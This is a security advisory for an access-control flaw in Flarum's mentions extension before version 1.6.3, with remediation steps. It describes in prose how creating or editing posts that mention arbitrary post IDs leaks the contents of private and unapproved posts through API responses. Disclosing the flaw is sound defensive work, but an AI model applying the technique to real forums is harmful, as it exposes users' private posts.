Sami Mazouz

**Name of the Vulnerable Software and Affected Versions** Flarum versions prior to 1.6.3 **Description** The issue concerns the mentions feature provided by the flarum/mentions extension, which allows users to mention any post ID on the forum using a special syntax. This feature leaks the discussion ID and post number of mentioned posts, regardless of the actor's ability to read them. The `mentionsPosts` relationship in the `POST /api/posts` and `PATCH /api/posts/<id>` JSON responses also leaks the full JSON:API payload of all mentioned posts without access control, including content, date, number, and attributes added by other extensions. An attacker can exploit this vulnerability by creating new posts on the forum, even if they require approval. If the attacker can edit posts, they can perform the attack more discreetly. The attack allows the leaking of all posts in the forum database, including posts awaiting approval, posts in tags the user has no access to, and private discussions created by other extensions. The discussion payload is not leaked, but the discussion ID of all posts can be extracted and combined back into their original discussions. **Recommendations** For Flarum versions prior to 1.6.3, update to version 1.6.3 by running `composer update --prefer-dist --no-dev -a -W` and confirm the update using `composer show flarum/core`. As a temporary workaround, consider disabling the mentions extension until the issue is resolved.